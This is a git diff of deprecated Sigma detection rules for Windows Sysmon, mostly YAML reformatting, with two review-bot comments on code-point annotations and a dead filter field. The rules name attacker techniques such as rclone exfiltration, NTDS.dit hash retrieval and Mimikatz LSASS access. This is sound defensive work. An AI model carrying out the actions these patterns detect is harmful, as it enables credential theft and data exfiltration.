 EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_spacing_modifiers: - CommandLine|contains: - - "\u02E3" - - "\u02EA" - - "\u02E2" - selection_unicode_slashes: - CommandLine|contains: - - "\u2215" - - "\u2044" - selection_unicode_hyphens: - CommandLine|contains: - - "\u2015" - - "\u2014" + CommandLine|contains: # spacing modifier letters that get auto-replaced + - ˣ # 0x02E3 + - ˪ # 0x02EA + - ˢ # 0x02E2 + selection_unicode_slashes: # forward slash alternatives + CommandLine|contains: + - ∕ # 0x22FF + - ⁄ # 0x206F + selection_unicode_hyphens: # hyphen alternatives + CommandLine|contains: + - ― # 0x2015 + - — # 0x2014 condition: process_creation and (1 of selection*) falsepositives: - Unknown
diff --git a/sigma/sysmon/deprecated/proc_creation_win_susp_lolbin_non_c_drive.yml b/sigma/sysmon/deprecated/proc_creation_win_susp_lolbin_non_c_drive.yml
index 25d453540..d31d4ad86 100644
--- a/sigma/sysmon/deprecated/proc_creation_win_susp_lolbin_non_c_drive.yml
+++ b/sigma/sysmon/deprecated/proc_creation_win_susp_lolbin_non_c_drive.yml
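Review bot: The hex comments on the two selection_unicode_slashes entries do not match the values they replace: the removed lines were `"\u2215"` and `"\u2044"`, but the new lines are annotated `# 0x22FF` and `# 0x206F`. If the bare glyphs are the same characters as before they should read `# 0x2215` and `# 0x2044`; if they are genuinely different code points, the detection has silently changed and the old escapes should be restored. Swapping escapes for bare literals also means the rule now depends on the file being read as UTF-8 everywhere it is loaded, and a correct code point comment next to each glyph is the only thing that lets a reviewer notice a mangled character, so the wrong values here are worth fixing rather than cosmetic.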
@@ -1,8 +1,7 @@
 title: Wscript Execution from Non C Drive id: 5b80cf53-3a46-4adc-960b-05ec19348d74 status: deprecated -description: Detects Wscript or Cscript executing from a drive other than C. This - has been observed with Qakbot executing from within a mounted ISO file. +description: Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file. references: - https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB_30.09.2022.txt - https://app.any.run/tasks/4985c746-601e-401a-9ccf-ae350ac2e887/
@@ -25,21 +24,21 @@ detection:
 - \wscript.exe - \cscript.exe selection_exetensions: - CommandLine|contains: + CommandLine|contains: - .js - .vbs - .vbe selection_drive_path: - CommandLine|contains: :\ + CommandLine|contains: :\ filter_drive_path: - CommandLine|contains: + CommandLine|contains: - ' C:\\' - - ' ''C:\' + - " 'C:\\" - ' "C:\\' filter_env_vars: - CommandLine|contains: '%' + CommandLine|contains: '%' filter_unc_paths: - CommandLine|contains: ' \\\\' + CommandLine|contains: ' \\\\' condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - Legitimate scripts located on other partitions such as "D:"
diff --git a/sigma/sysmon/deprecated/proc_creation_win_susp_run_folder.yml b/sigma/sysmon/deprecated/proc_creation_win_susp_run_folder.yml
index be4b38574..7f18f5b3f 100644
--- a/sigma/sysmon/deprecated/proc_creation_win_susp_run_folder.yml
+++ b/sigma/sysmon/deprecated/proc_creation_win_susp_run_folder.yml
@@ -1,8 +1,7 @@
 title: Process Start From Suspicious Folder id: dca91cfd-d7ab-4c66-8da7-ee57d487b35b status: deprecated -description: Detects process start from rare or uncommon folders like temporary folder - or folders that usually don't contain executable files +description: Detects process start from rare or uncommon folders like temporary folder or folders that usually don't contain executable files references: - Malware sandbox results author: frack113
@@ -25,19 +24,19 @@ detection:
 - \Temp\ - \Temporary Internet filter_parent: - - ParentImage: - - C:\Windows\System32\cleanmgr.exe - - C:\Program Files (x86)\Microsoft Visual Studio\Installer\resources\app\ServiceHub\Services\Microsoft.VisualStudio.Setup.Service\BackgroundDownload.exe - - C:\Windows\System32\dxgiadaptercache.exe - - ParentImage|startswith: C:\Program Files (x86)\NVIDIA Corporation\ + - ParentImage: + - C:\Windows\System32\cleanmgr.exe + - C:\Program Files (x86)\Microsoft Visual Studio\Installer\resources\app\ServiceHub\Services\Microsoft.VisualStudio.Setup.Service\BackgroundDownload.exe + - C:\Windows\System32\dxgiadaptercache.exe + - ParentImage|startswith: C:\Program Files (x86)\NVIDIA Corporation\ filter_other: - Image|endswith: setup.exe + Image|endswith: setup.exe # the missing \ at the beginning is intended - to cover e.g. MySoftwareSetup.exe as well filter_edge: Image|startswith: C:\Program Files (x86)\Microsoft\Temp\ Image|endswith: .tmp\MicrosoftEdgeUpdate.exe + #OriginalFileName: msedgeupdate.dll condition: process_creation and (selection and not 1 of filter*) falsepositives: - - Installers are expected to be run from the "AppData\Local\Temp" and "C:\Windows\Temp\" - directories + - Installers are expected to be run from the "AppData\Local\Temp" and "C:\Windows\Temp\" directories level: low ruletype: Sigma
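Review bot: The `filter_edge` block gains a commented-out field, `#OriginalFileName: msedgeupdate.dll`, with nothing saying why it is disabled. Dead config inside a filter is easy to misread as an active condition when skimming the rule, and a future edit that uncomments it would tighten the exclusion (all fields in a map are ANDed) and change which Edge updater events are suppressed. Either remove the line or turn it into a short explanatory comment, e.g. `# OriginalFileName deliberately not used as a filter field here - TODO record the reason`. The selection block this filter applies to starts before this hunk, so the full exclusion logic is not visible here.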
diff --git a/sigma/sysmon/deprecated/proc_creation_win_susp_squirrel_lolbin.yml b/sigma/sysmon/deprecated/proc_creation_win_susp_squirrel_lolbin.yml
index e21b6d2f4..2d46664bd 100644
--- a/sigma/sysmon/deprecated/proc_creation_win_susp_squirrel_lolbin.yml
+++ b/sigma/sysmon/deprecated/proc_creation_win_susp_squirrel_lolbin.yml
@@ -23,30 +23,30 @@ detection:
 selection1: Image|endswith: \update.exe selection2: - CommandLine|contains: + CommandLine|contains: - --processStart - --processStartAndWait - --createShortcut filter_discord: - CommandLine|contains|all: + CommandLine|contains|all: - C:\Users\ - \AppData\Local\Discord\Update.exe - ' --processStart' - Discord.exe filter_github_desktop: - CommandLine|contains|all: + CommandLine|contains|all: - C:\Users\ - \AppData\Local\GitHubDesktop\Update.exe - GitHubDesktop.exe - CommandLine|contains: + CommandLine|contains: - --createShortcut - --processStartAndWait filter_teams: - CommandLine|contains|all: + CommandLine|contains|all: - C:\Users\ - \AppData\Local\Microsoft\Teams\Update.exe - Teams.exe - CommandLine|contains: + CommandLine|contains: - --processStart - --createShortcut condition: process_creation and (all of selection* and not 1 of filter_*)
diff --git a/sigma/sysmon/deprecated/proc_creation_win_sysinternals_psexec_service_execution.yml b/sigma/sysmon/deprecated/proc_creation_win_sysinternals_psexec_service_execution.yml
index 18b6c7fab..8e9944649 100644
--- a/sigma/sysmon/deprecated/proc_creation_win_sysinternals_psexec_service_execution.yml
+++ b/sigma/sysmon/deprecated/proc_creation_win_sysinternals_psexec_service_execution.yml
@@ -1,8 +1,8 @@
 title: PsExec Tool Execution id: fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba related: - - id: 42c575ea-e41e-41f1-b248-8093c3e82a28 - type: derived + - id: 42c575ea-e41e-41f1-b248-8093c3e82a28 + type: derived status: deprecated description: Detects PsExec service execution via default service image name references:
@@ -25,7 +25,7 @@ detection:
 Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \PSEXESVC.exe - User|contains: + User|contains: # covers many language settings - AUTHORI - AUTORI condition: process_creation and selection
diff --git a/sigma/sysmon/deprecated/proc_creation_win_sysinternals_psexesvc_start.yml b/sigma/sysmon/deprecated/proc_creation_win_sysinternals_psexesvc_start.yml
index 84682846b..7d40ae97f 100644
--- a/sigma/sysmon/deprecated/proc_creation_win_sysinternals_psexesvc_start.yml
+++ b/sigma/sysmon/deprecated/proc_creation_win_sysinternals_psexesvc_start.yml
@@ -18,7 +18,7 @@ detection:
 EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine: C:\Windows\PSEXESVC.exe + CommandLine: C:\Windows\PSEXESVC.exe condition: process_creation and selection falsepositives: - Administrative activity
diff --git a/sigma/sysmon/deprecated/proc_creation_win_whoami_as_system.yml b/sigma/sysmon/deprecated/proc_creation_win_whoami_as_system.yml
index 597a6d675..3a0bad7f8 100644
--- a/sigma/sysmon/deprecated/proc_creation_win_whoami_as_system.yml
+++ b/sigma/sysmon/deprecated/proc_creation_win_whoami_as_system.yml
@@ -1,8 +1,7 @@
 title: Run Whoami as SYSTEM id: 80167ada-7a12-41ed-b8e9-aa47195c66a1 status: deprecated -description: Detects a whoami.exe executed by LOCAL SYSTEM. This may be a sign of - a successful local privilege escalation. +description: Detects a whoami.exe executed by LOCAL SYSTEM. This may be a sign of a successful local privilege escalation. references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment author: Teymur Kheirkhabarov, Florian Roth
@@ -21,12 +20,12 @@ detection:
 EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_user: - User|contains: + User|contains: # covers many language settings - AUTHORI - AUTORI selection_img: - - OriginalFileName: whoami.exe - - Image|endswith: \whoami.exe + - OriginalFileName: whoami.exe + - Image|endswith: \whoami.exe condition: process_creation and (all of selection*) falsepositives: - Possible name overlap with NT AUHTORITY substring to cover all languages
diff --git a/sigma/sysmon/deprecated/proc_creation_win_winword_dll_load.yml b/sigma/sysmon/deprecated/proc_creation_win_winword_dll_load.yml
index 99dbb7d30..849709103 100644
--- a/sigma/sysmon/deprecated/proc_creation_win_winword_dll_load.yml
+++ b/sigma/sysmon/deprecated/proc_creation_win_winword_dll_load.yml
@@ -16,7 +16,7 @@ detection:
 Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \winword.exe - CommandLine|contains: /l + CommandLine|contains: /l condition: process_creation and selection fields: - CommandLine
diff --git a/sigma/sysmon/deprecated/proc_creation_win_wmic_execution_via_office_process.yml b/sigma/sysmon/deprecated/proc_creation_win_wmic_execution_via_office_process.yml
index 79da678e0..10f837934 100644
--- a/sigma/sysmon/deprecated/proc_creation_win_wmic_execution_via_office_process.yml
+++ b/sigma/sysmon/deprecated/proc_creation_win_wmic_execution_via_office_process.yml
@@ -1,13 +1,12 @@
 title: WMI Execution Via Office Process id: 518643ba-7d9c-4fa5-9f37-baed36059f6a related: - - id: e1693bc8-7168-4eab-8718-cdcaa68a1738 - type: derived - - id: 438025f9-5856-4663-83f7-52f878a70a50 - type: similar + - id: e1693bc8-7168-4eab-8718-cdcaa68a1738 + type: derived + - id: 438025f9-5856-4663-83f7-52f878a70a50 + type: similar status: deprecated -description: Initial execution of malicious document calls wmic to execute the file - with regsvr32 +description: Initial execution of malicious document calls wmic to execute the file with regsvr32 references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml
@@ -29,8 +28,8 @@ detection:
 EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \wbem\WMIC.exe - - OriginalFileName: wmic.exe + - Image|endswith: \wbem\WMIC.exe + - OriginalFileName: wmic.exe selection_parent: ParentImage|endswith: - \winword.exe
diff --git a/sigma/sysmon/deprecated/proc_creation_win_wmic_remote_command.yml b/sigma/sysmon/deprecated/proc_creation_win_wmic_remote_command.yml
index c4f34f737..14d3333f2 100644
--- a/sigma/sysmon/deprecated/proc_creation_win_wmic_remote_command.yml
+++ b/sigma/sysmon/deprecated/proc_creation_win_wmic_remote_command.yml
@@ -20,10 +20,10 @@ detection:
 EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \WMIC.exe - - OriginalFileName: wmic.exe + - Image|endswith: \WMIC.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - '/node:' - process - call
diff --git a/sigma/sysmon/deprecated/proc_creation_win_wmic_remote_service.yml b/sigma/sysmon/deprecated/proc_creation_win_wmic_remote_service.yml
index e08650253..ef2bace58 100644
--- a/sigma/sysmon/deprecated/proc_creation_win_wmic_remote_service.yml
+++ b/sigma/sysmon/deprecated/proc_creation_win_wmic_remote_service.yml
@@ -1,19 +1,11 @@
 title: WMI Reconnaissance List Remote Services id: 09af397b-c5eb-4811-b2bb-08b3de464ebf status: deprecated -description: 'An adversary might use WMI to check if a certain Remote Service is running - on a remote device. - - When the test completes, a service information will be displayed on the screen - if it exists. - - A common feedback message is that "No instance(s) Available" if the service queried - is not running. - - A common error message is "Node - (provided IP or default) ERROR Description =The - RPC server is unavailable" if the provided remote host is unreachable - - ' +description: | + An adversary might use WMI to check if a certain Remote Service is running on a remote device. + When the test completes, a service information will be displayed on the screen if it exists. + A common feedback message is that "No instance(s) Available" if the service queried is not running. + A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic
@@ -32,10 +24,10 @@ detection:
 EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \WMIC.exe - - OriginalFileName: wmic.exe + - Image|endswith: \WMIC.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - '/node:' - service condition: process_creation and (all of selection*)
diff --git a/sigma/sysmon/deprecated/proc_creation_win_wuauclt_execution.yml b/sigma/sysmon/deprecated/proc_creation_win_wuauclt_execution.yml
index fd3353f7c..d81571ff6 100644
--- a/sigma/sysmon/deprecated/proc_creation_win_wuauclt_execution.yml
+++ b/sigma/sysmon/deprecated/proc_creation_win_wuauclt_execution.yml
@@ -21,15 +21,15 @@ detection:
 EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \wuauclt.exe - - OriginalFileName: wuauclt.exe + - Image|endswith: \wuauclt.exe + - OriginalFileName: wuauclt.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - /UpdateDeploymentProvider - /RunHandlerComServer - .dll filter: - CommandLine|contains: + CommandLine|contains: - ' /ClassId ' - ' wuaueng.dll ' condition: process_creation and (all of selection* and not filter)
diff --git a/sigma/sysmon/deprecated/process_creation_syncappvpublishingserver_exe.yml b/sigma/sysmon/deprecated/process_creation_syncappvpublishingserver_exe.yml
index 06f7a826e..4ac4066dc 100644
--- a/sigma/sysmon/deprecated/process_creation_syncappvpublishingserver_exe.yml
+++ b/sigma/sysmon/deprecated/process_creation_syncappvpublishingserver_exe.yml
@@ -1,10 +1,9 @@
 title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction id: fde7929d-8beb-4a4c-b922-be9974671667 -description: Detects SyncAppvPublishingServer process execution which usually utilized - by adversaries to bypass PowerShell execution restrictions. +description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. references: - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ -author: "Ensar \u015Eamil, @sblmsrsn, OSCD Community" +author: Ensar Şamil, @sblmsrsn, OSCD Community date: 2020/10/05 modified: 2022/04/11 tags:
diff --git a/sigma/sysmon/deprecated/registry_add_sysinternals_sdelete_registry_keys.yml b/sigma/sysmon/deprecated/registry_add_sysinternals_sdelete_registry_keys.yml
index 0c007ebfc..59459d52c 100644
--- a/sigma/sysmon/deprecated/registry_add_sysinternals_sdelete_registry_keys.yml
+++ b/sigma/sysmon/deprecated/registry_add_sysinternals_sdelete_registry_keys.yml
@@ -1,8 +1,7 @@
 title: Sysinternals SDelete Registry Keys id: 9841b233-8df8-4ad7-9133-b0b4402a9014 status: deprecated -description: A General detection to trigger for the creation or modification of .*\Software\Sysinternals\SDelete - registry keys. Indicators of the use of Sysinternals SDelete tool. +description: A General detection to trigger for the creation or modification of .*\Software\Sysinternals\SDelete registry keys. Indicators of the use of Sysinternals SDelete tool. references: - https://github.com/OTRF/detection-hackathon-apt29/issues/9 - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.B.2_59A9AC92-124D-4C4B-A6BF-3121C98677C3.md
@@ -21,7 +20,7 @@ detection:
 EventID: 12 Channel: Microsoft-Windows-Sysmon/Operational selection: - EventType: CreateKey + EventType: CreateKey TargetObject|contains: \Software\Sysinternals\SDelete condition: registry_add and selection falsepositives:
diff --git a/sigma/sysmon/deprecated/registry_event_asep_reg_keys_modification.yml b/sigma/sysmon/deprecated/registry_event_asep_reg_keys_modification.yml
index ed0eee88f..5005cfd06 100644
--- a/sigma/sysmon/deprecated/registry_event_asep_reg_keys_modification.yml
+++ b/sigma/sysmon/deprecated/registry_event_asep_reg_keys_modification.yml
@@ -5,11 +5,10 @@ status: deprecated
 references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys date: 2019/10/25 modified: 2022/05/14 -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton logsource: category: registry_event product: windows
@@ -194,25 +193,17 @@ detection:
 - \Lsa\Authentication Packages - \BootVerificationProgram\ImagePath filter: - - Details: (Empty) - - TargetObject|endswith: \NgcFirst\ConsecutiveSwitchCount - - Image: C:\WINDOWS\System32\svchost.exe - condition: registry_event and (( main_selection or session_manager_base and session_manager - or current_version_base and current_version or nt_current_version_base and - nt_current_version or wow_current_version_base and wow_current_version or - wow_nt_current_version_base and wow_nt_current_version or (wow_office or office) - and wow_office_details or (wow_ie or ie) and wow_ie_details or wow_classes_base - and wow_classes or classes_base and classes or scripts_base and scripts or - winsock_parameters_base and winsock_parameters or system_control_base and - system_control ) and not filter) + - Details: (Empty) + - TargetObject|endswith: \NgcFirst\ConsecutiveSwitchCount + - Image: C:\WINDOWS\System32\svchost.exe + condition: registry_event and (( main_selection or session_manager_base and session_manager or current_version_base and current_version or nt_current_version_base and nt_current_version or wow_current_version_base and wow_current_version or wow_nt_current_version_base and wow_nt_current_version or (wow_office or office) and wow_office_details or (wow_ie or ie) and wow_ie_details or wow_classes_base and wow_classes or classes_base and classes or scripts_base and scripts or winsock_parameters_base and winsock_parameters or system_control_base and system_control ) and not filter) fields: - SecurityID - ObjectName - OldValueType - NewValueType falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason tags: - attack.persistence
diff --git a/sigma/sysmon/deprecated/registry_set_abusing_windows_telemetry_for_persistence.yml b/sigma/sysmon/deprecated/registry_set_abusing_windows_telemetry_for_persistence.yml
index bd1fad121..a67825ece 100644
--- a/sigma/sysmon/deprecated/registry_set_abusing_windows_telemetry_for_persistence.yml
+++ b/sigma/sysmon/deprecated/registry_set_abusing_windows_telemetry_for_persistence.yml
@@ -1,16 +1,10 @@
 title: Abusing Windows Telemetry For Persistence - Registry id: 4e8d5fd3-c959-441f-a941-f73d0cdcdca5 status: deprecated -description: 'Windows telemetry makes use of the binary CompatTelRunner.exe to run - a variety of commands and perform the actual telemetry collections. - - This binary was created to be easily extensible, and to that end, it relies on - the registry to instruct on which commands to run. - - The problem is, it will run any arbitrary command without restriction of location - or type. - - ' +description: | + Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. + This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. + The problem is, it will run any arbitrary command without restriction of location or type. references: - https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/ author: Sreeman
diff --git a/sigma/sysmon/deprecated/registry_set_add_hidden_user.yml b/sigma/sysmon/deprecated/registry_set_add_hidden_user.yml
index 01d03be63..d24dbe052 100644
--- a/sigma/sysmon/deprecated/registry_set_add_hidden_user.yml
+++ b/sigma/sysmon/deprecated/registry_set_add_hidden_user.yml
@@ -1,8 +1,7 @@
 title: User Account Hidden By Registry id: 8a58209c-7ae6-4027-afb0-307a78e4589a status: deprecated -description: Detect modification for a specific user to prevent that user from being - listed on the logon screen +description: Detect modification for a specific user to prevent that user from being listed on the logon screen references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md author: frack113
diff --git a/sigma/sysmon/deprecated/registry_set_disable_microsoft_office_security_features.yml b/sigma/sysmon/deprecated/registry_set_disable_microsoft_office_security_features.yml
index 23f1ed449..5a0bdd4d9 100644
--- a/sigma/sysmon/deprecated/registry_set_disable_microsoft_office_security_features.yml
+++ b/sigma/sysmon/deprecated/registry_set_disable_microsoft_office_security_features.yml
@@ -17,6 +17,11 @@ logsource:
 product: windows category: registry_set definition: key must be add to the sysmon configuration to works + # Sysmon + # \VBAWarnings + # \DisableInternetFilesInPV + # \DisableUnsafeLocationsInPV + # \DisableAttachementsInPV detection: registry_set: EventID: 13
diff --git a/sigma/sysmon/deprecated/registry_set_office_security.yml b/sigma/sysmon/deprecated/registry_set_office_security.yml
index 440d6044c..2ad80625d 100644
--- a/sigma/sysmon/deprecated/registry_set_office_security.yml
+++ b/sigma/sysmon/deprecated/registry_set_office_security.yml
@@ -1,8 +1,7 @@
 title: Office Security Settings Changed id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd status: deprecated -description: Detects registry changes to Office macro settings. The TrustRecords contain - information on executed macro-enabled documents. (see references) +description: Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references) references: - https://twitter.com/inversecos/status/1494174785621819397 - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/
diff --git a/sigma/sysmon/deprecated/registry_set_silentprocessexit.yml b/sigma/sysmon/deprecated/registry_set_silentprocessexit.yml
index f06c06827..e197d5836 100644
--- a/sigma/sysmon/deprecated/registry_set_silentprocessexit.yml
+++ b/sigma/sysmon/deprecated/registry_set_silentprocessexit.yml
@@ -1,8 +1,7 @@
 title: SilentProcessExit Monitor Registration id: c81fe886-cac0-4913-a511-2822d72ff505 status: deprecated -description: Detects changes to the Registry in which a monitor program gets registered - to monitor the exit of another process +description: Detects changes to the Registry in which a monitor program gets registered to monitor the exit of another process references: - https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/ - https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/
diff --git a/sigma/sysmon/deprecated/sysmon_dcom_iertutil_dll_hijack.yml b/sigma/sysmon/deprecated/sysmon_dcom_iertutil_dll_hijack.yml
index 81ea2d871..606ed4cea 100644
--- a/sigma/sysmon/deprecated/sysmon_dcom_iertutil_dll_hijack.yml
+++ b/sigma/sysmon/deprecated/sysmon_dcom_iertutil_dll_hijack.yml
@@ -1,9 +1,7 @@ title: DCOM InternetExplorer.Application Iertutil DLL Hijack - Sysmon id: e554f142-5cf3-4e55-ace9-a1b59e0def65 status: deprecated -description: Detects a threat actor creating a file named `iertutil.dll` in the `C:\Program - Files\Internet Explorer\` directory over the network and loading it for a DCOM - InternetExplorer DLL Hijack scenario. +description: Detects a threat actor creating a file named `iertutil.dll` in the `C:\Program Files\Internet Explorer\` directory over the network and loading it for a DCOM InternetExplorer DLL Hijack scenario. references: - https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga diff --git a/sigma/sysmon/deprecated/sysmon_mimikatz_detection_lsass.yml b/sigma/sysmon/deprecated/sysmon_mimikatz_detection_lsass.yml index ebe6d7377..527d6cbf5 100644 --- a/sigma/sysmon/deprecated/sysmon_mimikatz_detection_lsass.yml +++ b/sigma/sysmon/deprecated/sysmon_mimikatz_detection_lsass.yml @@ -1,9 +1,7 @@ title: Mimikatz Detection LSASS Access id: 0d894093-71bc-43c3-8c4d-ecfc28dcf5d9 status: deprecated -description: Detects process access to LSASS which is typical for Mimikatz (0x1000 - PROCESS_QUERY_ LIMITED_INFORMATION, 0x0400 PROCESS_QUERY_ INFORMATION "only old - versions", 0x0010 PROCESS_VM_READ) +description: Detects process access to LSASS which is typical for Mimikatz (0x1000 PROCESS_QUERY_ LIMITED_INFORMATION, 0x0400 PROCESS_QUERY_ INFORMATION "only old versions", 0x0010 PROCESS_VM_READ) references: - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow - https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html 
diff --git a/sigma/sysmon/deprecated/sysmon_powershell_execution_moduleload.yml b/sigma/sysmon/deprecated/sysmon_powershell_execution_moduleload.yml index cbaa6f451..b9f84c88a 100644 --- a/sigma/sysmon/deprecated/sysmon_powershell_execution_moduleload.yml +++ b/sigma/sysmon/deprecated/sysmon_powershell_execution_moduleload.yml @@ -9,7 +9,7 @@ references: - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html tags: - attack.execution - - attack.t1086 + - attack.t1086 # an old one - attack.t1059.001 - sysmon logsource: diff --git a/sigma/sysmon/deprecated/sysmon_rclone_execution.yml b/sigma/sysmon/deprecated/sysmon_rclone_execution.yml index 6e5631f80..9573c032b 100644 --- a/sigma/sysmon/deprecated/sysmon_rclone_execution.yml +++ b/sigma/sysmon/deprecated/sysmon_rclone_execution.yml @@ -1,8 +1,7 @@ title: RClone Execution id: a0d63692-a531-4912-ad39-4393325b2a9c status: deprecated -description: Detects execution of RClone utility for exfiltration as used by various - ransomwares strains like REvil, Conti, FiveHands, etc +description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc tags: - attack.exfiltration - attack.t1567.002 @@ -32,14 +31,14 @@ detection: selection: Description: Rsync for cloud storage selection2: - CommandLine|contains|all: + CommandLine|contains|all: - '--config ' - '--no-check-certificate ' - ' copy ' selection3: Image|endswith: - \rclone.exe - CommandLine|contains: + CommandLine|contains: - mega - pcloud - ftp diff --git a/sigma/sysmon/deprecated/win_dsquery_domain_trust_discovery.yml b/sigma/sysmon/deprecated/win_dsquery_domain_trust_discovery.yml index 68971ed13..e59631ecb 100644 --- a/sigma/sysmon/deprecated/win_dsquery_domain_trust_discovery.yml +++ b/sigma/sysmon/deprecated/win_dsquery_domain_trust_discovery.yml 
@@ -19,12 +19,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \dsquery.exe - CommandLine|contains|all: - - -filter - - trustedDomain - - Image|endswith: \nltest.exe - CommandLine|contains: domain_trusts + - Image|endswith: \dsquery.exe + CommandLine|contains|all: + - -filter + - trustedDomain + - Image|endswith: \nltest.exe + CommandLine|contains: domain_trusts condition: process_creation and selection falsepositives: - Administration of systems. diff --git a/sigma/sysmon/deprecated/win_susp_esentutl_activity.yml b/sigma/sysmon/deprecated/win_susp_esentutl_activity.yml index 6ed0e7b0e..5f2ad209d 100644 --- a/sigma/sysmon/deprecated/win_susp_esentutl_activity.yml +++ b/sigma/sysmon/deprecated/win_susp_esentutl_activity.yml @@ -1,9 +1,7 @@ title: Suspicious Esentutl Use id: 56a8189f-11b2-48c8-8ca7-c54b03c2fbf7 status: deprecated -description: Detects flags often used with the LOLBAS Esentutl for malicious activity. - It could be used in rare cases by administrators to access locked files or during - maintenance. +description: Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance. author: Florian Roth (Nextron Systems) date: 2020/05/23 modified: 2022/04/11 @@ -24,7 +22,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - ' /vss ' - ' /y ' condition: process_creation and selection diff --git a/sigma/sysmon/deprecated/win_susp_rclone_exec.yml b/sigma/sysmon/deprecated/win_susp_rclone_exec.yml index 9816b1c37..6123b7c99 100644 --- a/sigma/sysmon/deprecated/win_susp_rclone_exec.yml +++ b/sigma/sysmon/deprecated/win_susp_rclone_exec.yml @@ -27,7 +27,7 @@ detection: - \PowerShell.exe - \cmd.exe command_selection: - CommandLine|contains: + CommandLine|contains: - ' pass ' - ' user ' - ' copy ' 
@@ -39,6 +39,5 @@ detection: - ' ls ' description_selection: Description: Rsync for cloud storage - condition: process_creation and (command_selection and ( description_selection - or exec_selection )) + condition: process_creation and (command_selection and ( description_selection or exec_selection )) ruletype: Sigma diff --git a/sigma/sysmon/deprecated/win_susp_vssadmin_ntds_activity.yml b/sigma/sysmon/deprecated/win_susp_vssadmin_ntds_activity.yml index e7331443c..cb51165dd 100644 --- a/sigma/sysmon/deprecated/win_susp_vssadmin_ntds_activity.yml +++ b/sigma/sysmon/deprecated/win_susp_vssadmin_ntds_activity.yml @@ -1,8 +1,7 @@ title: Activity Related to NTDS.dit Domain Hash Retrieval id: b932b60f-fdda-4d53-8eda-a170c1d97bbd status: deprecated -description: Detects suspicious commands that could be related to activity that uses - volume shadow copy to steal and retrieve hashes from the NTDS.dit file remotely +description: Detects suspicious commands that could be related to activity that uses volume shadow copy to steal and retrieve hashes from the NTDS.dit file remotely author: Florian Roth (Nextron Systems), Michael Haag date: 2019/01/16 modified: 2022/04/11 @@ -24,7 +23,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine: + 